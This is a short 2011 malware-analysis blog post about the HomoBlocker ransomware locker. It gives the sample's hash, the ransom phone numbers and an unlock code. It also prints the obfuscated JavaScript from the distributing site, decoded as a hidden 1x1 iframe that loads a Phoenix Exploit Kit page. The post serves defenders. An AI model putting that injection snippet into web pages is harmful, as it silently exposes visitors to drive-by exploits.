Sunday 16 January 2011

Trojan.Ransom (HomoBlocker)



This trojan blocker ( MD5: bbbecfd1ff100a2e70cd163b05de177d ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.


Number to Call: 9099010810
Number to Call: 9099010759 (thanks to Gmax for this one)
Number to Call: 9629464469
Number to Call: 9629463283
Number to Call: 9629459917
Code to unlock Windows: DNKEYS

HomoBlocker is a variant of pornoplayer
HomoBlocker was already analyzed on the past: here (15 Jan 2k11)

Short website analyze ~

"fuck.js" contain:
var _0x11f3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x2F\x6B\x61\x6C\x2F\x61\x6E\x65\x74\x64\x71\x79\x6F\x63\x75\x65\x76\x65\x6D\x63\x33\x2E\x70\x68\x70\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x11f3[2]](_0x11f3[1])[_0x11f3[0]]=_0x11f3[3];

When deobfuscated:
document['getElementById']('clear_block')['innerHTML'] = '<iframe src="/kal/anetdqyocuevemc3.php" width="1" height="1" scrolling="no" frameborder="0"></iframe>';

The "/kal/anetdqyocuevemc3.php" was a file from Phoenix Exploit Kit



1 comment: